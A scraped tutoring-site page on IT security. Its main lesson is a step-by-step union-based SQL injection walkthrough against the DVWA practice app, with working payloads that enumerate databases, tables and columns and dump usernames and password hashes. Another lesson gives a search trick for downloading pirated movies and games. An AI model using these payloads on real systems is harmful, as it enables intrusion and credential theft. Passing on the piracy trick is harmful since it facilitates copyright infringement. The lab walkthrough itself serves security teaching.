Signup as a Tutor

As a tutor you can connect with more than a million students and grow your network.

IT Security Management

IT Security Management

Trending Questions and Lessons

Follow 2,373 Followers

Ask a Question

Feed

All

All

Lessons

Discussion

Lesson Posted on 31 Mar IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Google searching trick to download any movie, game, software

Ashok Kumar

I can teach each and every topics very easily and make it stronger for the students.

Hi guys, if you had trouble finding movies or games. Try searching google for the parent directory e.g., Parent directory gta5 pc E.g., parent directory lord of the rings.mkv E.g., parent directory lord of the rings. mp4
Comments
Dislike Bookmark

Lesson Posted on 11 Jan IT Courses/IT Security Management /Ethical Hacking & Cyber Security IT Courses/Application Security IT Courses +2 Tuition/BTech Tuition/Information &Web Security Tuition/BSc Tuition/Information Security less

Union Based SQL Injection | DVWA (Legal)

Palvinder Singh

Cyber Security Analyst, has done "Bachelor Technology in Information Technology" and "Certified Ethical...

Union Based Injection:Technology: phpDatabase: MysqlThe main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).DVWA: Damnn Vulnerable Web Application:A... read more

Union Based Injection:

Technology: php
Database: Mysql

The main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).

DVWA: Damnn Vulnerable Web Application:
A legal application, for security proffesionals to test their skills in some legal platforms.

Union Based Sql Injection:

Dvwa: Low Level

Step 1: Find GET Method on website

url:

?id=1
?pid=98765
?clothes=jean
?product=ilk

?Something=something

By trying, every possible option on website i.e search, links, submit, help etc

Step 2: Try or Check for Exception Handling

?id=2'

try inverted comma('), after value of get method

Result:
If any sql error is there, images missing, content corrupted etc
=> Website is vulnerable for SQL Injection


Step 3: Check No. of Column: "order by"


id=2' order by 1--+   ==> Normal result
id=2' order by 2--+   ==> Normal result
id=2' order by 3--+   ==> Normal result
id=2' order by 4--+   ==> Normal result
id=2' order by 5--+   ==> error

So, No. of column = 4

Step 4: Check for vulnerable column no. among (1,2,3,4)

id=2' union select 1,2,3,4--+

Result= 2/3/1/4

This will show some random number on screen, that no. will be vulnerable for further injection

Step 5: Get name of database

database()

id=2' union select 1,database(),3,4--+  

Step 6: Get version of database

version()

id=2' union select 1,version(),3,4--+  

Step 7: Get list of tables

id=2' union select 1,table_name,3,4 from information_schema.tables--+  

Result: Will list all tables and we have to select those table name, which seems to be having sensitive information

admin
users
login
passwrds
credit
debit
card_details
..
..
etc

Step 8: Get Columns of selected table

id=2' union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+

Result: user,password

Step 9: Get Data of respected column names

id=2' union select 1,user,3,4 from users--+

Result: This

id=2' union select 1,passowrd,3,4 from users--+

md5 encrypted password.

read less
Comments
Dislike Bookmark

Lesson Posted on 07 Jan IT Courses/IT Security Management /Ethical Hacking & Cyber Security IT Courses/Application Security Tuition/BTech Tuition/Information &Web Security

Union Based SQL Injection Live Website (Legal)

Palvinder Singh

Cyber Security Analyst, has done "Bachelor Technology in Information Technology" and "Certified Ethical...

Start Performing SQL Injection and get database from backend. Website is : http://testphp.vulnweb.com/ For any doubt and queries contact me, will share complete walkhrough and Solutions
Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 06 Jan IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Palvinder Singh

Cyber Security Analyst

For getting into Ethical Hacking, you must have to do Certification in Ethical Hacking(CEH). You can search for Information Security and Ethical Hacking Course. Its cost will be approx Rs 25k to Rs 30k.
Answers 6 Comments
Dislike Bookmark

Answered on 12/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Mahesh Raja

Learn Linux And Networking.

I can teach you ethical hacking.. i am a certified security consultant
Answers 5 Comments
Dislike Bookmark

Answered on 06 Jan IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Where can I find a comprehensive list of known OS vulnerabilities sorted by OS version?

Palvinder Singh

Cyber Security Analyst

List of Vulnerabilities in a sorted order can be only found on basis of there CVE number. Every vulnerability coming world wide has unique CVE number and its CVSS Score. So the Common platform, where you can find all is cvedetials. Here you can search for any Operating System.
Answers 1 Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 19/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Where does a certified ethical hacker gets the job?

Punith

IT Companies
Answers 2 Comments
Dislike Bookmark

Answered on 16/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Which certification in IT security has the highest value?

Laurels Overseas Educational Consultancy

ECSA & CISSP - Depends on the level of support in our work we need to upskill and complete these certifications.
Answers 2 Comments 1
Dislike Bookmark

Answered on 19/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Which language is necessary for studying ethical hacking?

CyberFIT

python, html, linux, sql
Answers 2 Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 17/02/2016 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

The Institute of Information Security

If you are an beginner and dont have any knowledge about Information Security and wants to learn from Basic , we have 12 days program for CEH - EC COUNCIL.
Answers 9 Comments
Dislike Bookmark

About UrbanPro

UrbanPro.com helps you to connect with the best IT Security Management Training in India. Post Your Requirement today and get connected.

Overview

Questions 479

Lessons 16

Total Shares  

Related Topics

Top Contributors

Connect with Expert Tutors & Institutes for IT Security Management

x

Ask a Question

Please enter your Question

Please select a Tag